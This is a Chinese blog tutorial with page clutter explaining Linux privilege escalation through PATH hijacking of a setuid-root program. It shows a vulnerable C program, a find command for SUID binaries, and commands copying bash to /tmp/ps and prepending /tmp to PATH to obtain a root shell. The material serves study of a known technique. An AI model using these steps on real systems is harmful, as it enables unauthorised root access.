linux利用环境变量提权

最新推荐文章于 2024-07-25 15:50:18 发布

大飞先生

最新推荐文章于 2024-07-25 15:50:18 发布

阅读量286

点赞数

文章标签： bash linux java

本文链接：https://blog.csdn.net/m0_63917373/article/details/130486423

版权

攻击原理：管理员编译了程序，给予了程序管理员的方案，攻击者通过对程序的运行、调试、反编译等得到了程序的运行大概逻辑，尝试对程序调用的环境变量进行复制后覆盖，导致程序加载继承权限。

实验环境：c语言脚本，会执行PS命令，系统自带的变量ps路径为/bin/ps

#include <unistd.h>
#include <string.h>
#include <stdlib.h>
void main()
{
        setuid(0);
        setgid(0);
        system("ps");
}

1.探针：find / -user root -perm -4000 -print 2>/dev/null

2.root用户将可执行文件进行编译，保证文件的正常授权运行，给予ROOT权限执行

gcc demo.c -o shell
chmod u+s shell

普通用户通过对文件反编译或源代码查看，覆盖其执行环境变量，直接让其执行指定程序获取权限

#将bash命令复制到tmp目录下，覆盖c语言脚本生成的ps命令，当我们执行shell的时候，默认执行ps命令的root权限

cp /bin/bash /tmp/ps

4.利用原理：没有环境变量就找当前对应程序名，有环境变量就找环境调用

#添加环境变量

export PATH=/tmp:$PATH

#查看是否添加成功

find / -user root -perm -4000 -print 2>/dev/null

./shell

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

大飞先生

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
打赏
0
评论
linux利用环境变量提权

linux环境变量提权linux提权
复制链接

扫一扫

[Vulnhub] PWNLAB-init Linux利用环境变量提权

weixin_45605352的博客

05-18

527

0x00 环境搭建靶机地址：https://www.vulnhub.com/entry/pwnlab-init,158/ 下载之后用vmware打开即可，这里使用的是桥接模式。开机后搭建完成： 0x01 主机端口探测用arp-scan -l 探测内网存活主机，再用nmap -sV -p- ip来探测端口：发现开放了80端口（HTTP服务）和3306端口（MySQL服务）。 0x02 web渗透访问80端口，没有发现什么可以利用的点：用nikto扫描，发现了config.php，里面可能

uvalde-bash提权

书山有路勤为径，学海无涯苦作舟

06-22

316

VM网络不通也没法改密码进去，只能下个VirtualBox和VMware互通了但这也不行，看来只能使用端口映射了。

参与评论您还未登录，请先登录后发表或查看评论

Linux环境变量提权

qq_58000413的博客

05-23

713

PATH是Linux和类Unix操作系统中的环境，它指定存储可执行程序的所有bin和sbin目录。linux本地提权，漏洞范围：4.10 < linux内核版本 < 5.1.17。2、只能作用在二进制程序上，不能作用在脚本上，且设置在目录上无意义。snap版本 2.28 < snapd < 2.37。3、执行suid权限的进程时，此用户将继承此程序的所有者权限。1、启动为进程之后，其进程的属主为原程序文件的属主。Linux包管理器snap本地提权漏洞。使用dirty.c脚本进行提权。

Linux环境变量劫持提权

Longwaer

01-02

3086

环境变量劫持提权：本文通过查找SUID文件，劫持环境变量，从而使账号成功提权至root；本次实验环境靶场来自于暗月(moonsec)师傅，文中内容全由个人理解编制，若有错处，大佬勿喷，个人学艺不精；本文中提到的任何技术都源自于靶场练习，仅供学习参考，请勿利用文章内的相关技术从事非法测试，如因产生的一切不良后果与文章作者无关。 ** 个人理解：首先环境变量劫持提权的条件，就是系统中存在带有suid的文件，且这个文件中必须有系统命令；这样我们就可以命名一个和这个系统命令相同的文件，写入/bin

linux环境变量提权

m0_73481504的博客

03-31

771

在Linux系统中的PATH是一个环境变量，它指定了存储所有可执行程序的 bin 和 sbin 目录。当用户在终端运行任何命令时，系统会根据环境变量来查找可执行文件以及用户执行的命令。

Escalate_Linux-环境变量劫持提权(5)

苏生要努力

02-24

616

在Shll输入命令时，Shel会按PAH环境变量中的路径依次搜索命令，若是存在同名的命令，则执行最先找到的，若是PATH中加入了当前目录，也就是“”这个符号，则可能会被黑客利用，例如在“mp”目录下黑客新建了一个恶意文件ls”,若root用户在“tmp”目录下运行ls”命令时，那么将会运行黑客创建的恶意文件。在She11输入命令时，She11会按PATH环境变量中的路径依次搜索命令，若是存在同名的命令，则执行最先找到的，若是PATH中加入了当前目录，也就是".”这个符号，则可能会被黑客利用。

LINUX提权之环境变量提权篇

ALLEN'Blog

01-10

616

今天给大家带来了环境变量提权比较简单的方法不知道大家听明白了没有，环境变量提权中比较重要的就是结合suid权限来展开，本文只是简单列举了其中的几个方法，因为本人也很少用这种方法，可能理解的不是很到位望大佬们指点，如果喜欢本文不妨一键三连支持一下。

内网提权：suid+劫持环境变量提权

自知.的博客

05-08

572

环境变量劫持提权的原理就是我们劫持了一个本身就具有SUID权限、root身份运行权限、可sudo的程序。不过普通用户没法修改root用户身份运行程序的环境变量，sudo需要知道当前用户密码，所以一般结合suid进行提权。

linux中利用环境变量PATH提权

weixin_49340699的博客

07-16

3497

linux中利用环境变量PATH提权实验环境准备实验环境准备准备一台kali模拟攻击者192.168.19.131 准备一台ubuntu模拟被攻击者IP:192.168.19.130 在ubuntu创建一个低权限用户user2 在kdu用户的工作目录下创建一个c程序调用系统命令cat gcc编译该c程序为文件shl ...

Linux提权第二篇-Linux SUID提权&劫持环境变量提权

Love&Share

11-18

1990

文章目录Linux SUID提权Demo劫持环境变量提权其他骚思路 Linux SUID提权 SUID是一种特殊的文件属性，它允许用户执行的文件已该文件的拥有者的身份运行，比如一个具有SUID属性的文件的拥有者是root用户，就可以root权限运行 SUID是一种对二进制程序进行设置的特殊权限，可以让二进制程序的执行者临时拥有属主的权限（仅对拥有执行权限的二进制程序有效）。例如，所有用户都可以执行passwd命令来修改自己的用户密码，而用户密码保存在/etc/shadow文件中。仔细查看这个文件就会发现.

Linux利用UDF库实现Mysql提权

09-10

本篇将详细介绍如何利用UDF库来实现MySQL的提权操作。首先，提权通常涉及到获取更高的系统权限，而在MySQL中，通过UDF库可以执行系统级别的命令，从而可能达到提升权限的目的。要实现这一过程，我们需要满足以下...

权限提升-linux提权手法总结

01-14

### 权限提升-linux提权手法总结 #### 1. Linux提权概述在Linux系统中，权限管理是一项至关重要的安全措施。用户被赋予不同级别的权限来访问系统资源和服务。然而，在某些情况下，攻击者可能会试图通过各种手段来...

linux提权代码

06-04

2. **环境变量利用**：恶意用户可能通过修改环境变量来触发提权，例如修改`LD_PRELOAD`来加载恶意库，或通过`PATH`变量重定向系统命令。 3. **服务漏洞**：很多系统服务默认运行在root权限下，如果存在安全漏洞，...

Linux下非交互式提权详解

09-15

本文主要讲解了在Linux环境下如何进行非交互式提权，并提供了相关工具和方法。在无法反弹shell的情况下，这种方法尤为实用，因为它允许在没有交互环境的情况下运行提权工具并检查结果。首先，文章中提到了一个简单...

提权技术详解.pptx

09-03

提权技术，通常在网络安全领域中被提及，指的是攻击者通过获取系统中的较低权限，然后利用漏洞或策略缺陷提升自身权限，最终达到控制系统或获取敏感信息的目的。提权技术涵盖多种技术和策略，包括但不限于操作系统...

Linux 4: Bash

weixin_48029567的博客

07-23

475

1 绝对路径、相对路径2 alias3 内置的builtin4 $PATH找到的第一个命令。

Linux初学基本命令

最新发布

yuan20010401的博客

07-25

520

1、rm 文件名称删除多个文件多个目录需要用空格删除根目录（rm -rf /*）1、touch 文件名字用于linux创建文件创建多个目录需要用空格隔开。2、mkdir 目录名称用于创建文件夹创建多个嵌套文件夹需要用/隔开。1、cp 当前文件其他目录名称拷贝文件夹需要在最后 -r。退出不保存时按Esc+:q!1、ls 查看当前目录下面的文件或者文件夹。2、more 文件名称查看文件更多内容。1、mv 原文件路径目标文件路径。退出保存时按Esc + :wq。

【linux】Shell脚本三剑客之awk命令的详细用法攻略

景天科技苑

07-24

4876

在Linux和Unix系统中，awk是一种强大的文本处理工具，广泛应用于数据提取、分析和报告生成。它基于模式匹配和条件执行，能够逐行读取输入文本文件，并对每行数据执行指定的操作。本教程将详细介绍`awk`在shell脚本中的用法，包括其基本语法、常用选项、内置变量、高级特性以及结合shell脚本的实际案例。

linux环境变量提权原理

08-13

回答: 在Linux环境中，提权原理是通过修改可执行文件的权限或者改变执行环境变量来获取Root权限。一种方法是将可执行文件设置为Set-UID或Set-GID，并将其所有者设置为Root，这样当普通用户执行该文件时，实际上是以Root权限执行的。另一种方法是通过修改执行环境变量，例如修改PATH变量，使其指向一个恶意程序，当普通用户执行了这个程序时，就会以Root权限执行该程序，从而获取Root权限。这些方法都需要具备对文件的访问权限，一般只有Root用户才能对系统文件进行修改。<span class="em">1</span><span class="em">2</span> #### 引用[.reference_title] - *1* *2* [linux利用环境变量提权](https://blog.csdn.net/m0_63917373/article/details/130486423)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]